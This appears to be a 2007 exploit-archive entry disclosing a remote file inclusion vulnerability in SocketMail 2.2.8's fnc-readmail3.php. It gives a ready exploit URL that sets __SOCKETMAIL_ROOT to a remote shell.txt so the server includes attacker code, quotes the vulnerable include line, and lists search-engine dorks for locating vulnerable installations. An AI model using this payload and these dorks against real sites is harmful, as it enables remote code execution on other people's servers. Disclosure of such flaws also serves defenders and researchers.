[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : SocketMail 2.2.8 fnc-readmail3.php Remote File Inclusion Vulnerability
# Published : 2007-10-22
# Author : BiNgZa
# Previous Title : PHP Image 1.2 Multiple Remote File Inclusion Vulnerabilities
# Next Title : TOWeLS 0.1 scripture.php Remote File Inclusion Vulnerability
Vulnerability Type: Remote File Inclusion
Vulnerable file: /mail/content/fnc-readmail3.php
Exploit URL: http://localhost/mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: __SOCKETMAIL_ROOT
Line number: 399
Lines:
----------------------------------------------
} else {
include_once($__SOCKETMAIL_ROOT."/content/fnc-readmail.std.php");
}
----------------------------------------------
GrEeTs To sHaDoW sEcUrItY TeAm, str0ke
BiG sHoUt OuT tO udplink.net
FoUnD By BiNgZa
DoRk:"Powered by SocketMail Lite version 2.2.8. Copyright ?? 2002-2006"
DORK2: "Powered by SocketMail"
shadowcrew@hotmail.co.uk
shadow.php0h.com
# www.Syue.com [2007-10-22]